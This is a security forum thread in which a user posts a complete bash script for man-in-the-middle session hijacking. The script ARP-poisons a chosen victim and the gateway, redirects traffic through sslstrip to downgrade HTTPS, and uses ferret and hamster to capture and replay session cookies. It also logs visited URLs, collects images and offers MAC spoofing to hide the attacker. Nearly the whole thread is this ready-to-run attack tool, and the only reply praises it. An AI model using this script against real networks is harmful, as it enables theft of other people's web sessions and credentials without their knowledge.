Results 1 to 2 of 2

Thread: Another script for sidejacking... [sidejackssl.sh]

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Another script for sidejacking... [sidejackssl.sh]

    I already posted this script for Backtrack 4 R2, updated it to work in BT5... here it is:

    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.3
    # tested in backtrack 5 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # driftnet for fun
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file and path variables
    strippath="/pentest/web/sslstrip"	# sslstrip path
    hamsterpath="/pentest/sniffers/hamster" # hamster path
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    version="$infostyle sidejacker/sslstrip script v0.3, by gorara"
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e $version
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: console>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e $hamsterpath/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e $hamsterpath/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e python $strippath/sslstrip.py -a -k -f -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$execstyle starting driftnet ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0
    Make sure you have installed hamster and ferret if you haven't already.

  2. #2
    Just burned their ISO
    Join Date
    Sep 2011
    Location
    Matrix
    Posts
    18

    Default AW: Another script for sidejacking... [sidejackssl.sh]

    Awesome script thanks!!! Would be nice if you add a requirementschecker simple with apt-get bla bla xD seems like the bt5 kde havent preinstalled hamster and ferret =(

Similar Threads

  1. Another script for sidejacking..
    By gorara in forum Experts Forum
    Replies: 14
    Last Post: 05-04-2011, 12:40 PM
  2. [Video] Session Sidejacking (Ferret and Hamster)
    By g0tmi1k in forum BackTrack Videos
    Replies: 15
    Last Post: 09-16-2010, 05:00 AM
  3. Sidejacking on wep networks?
    By EndOfDays442 in forum Beginners Forum
    Replies: 1
    Last Post: 03-16-2010, 06:17 PM
  4. Sidejacking after decrypting WPA packets from capture
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-03-2009, 05:15 PM
  5. SideJacking
    By imported_Speedy in forum OLD Tutorials and Guides
    Replies: 6
    Last Post: 11-16-2008, 12:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •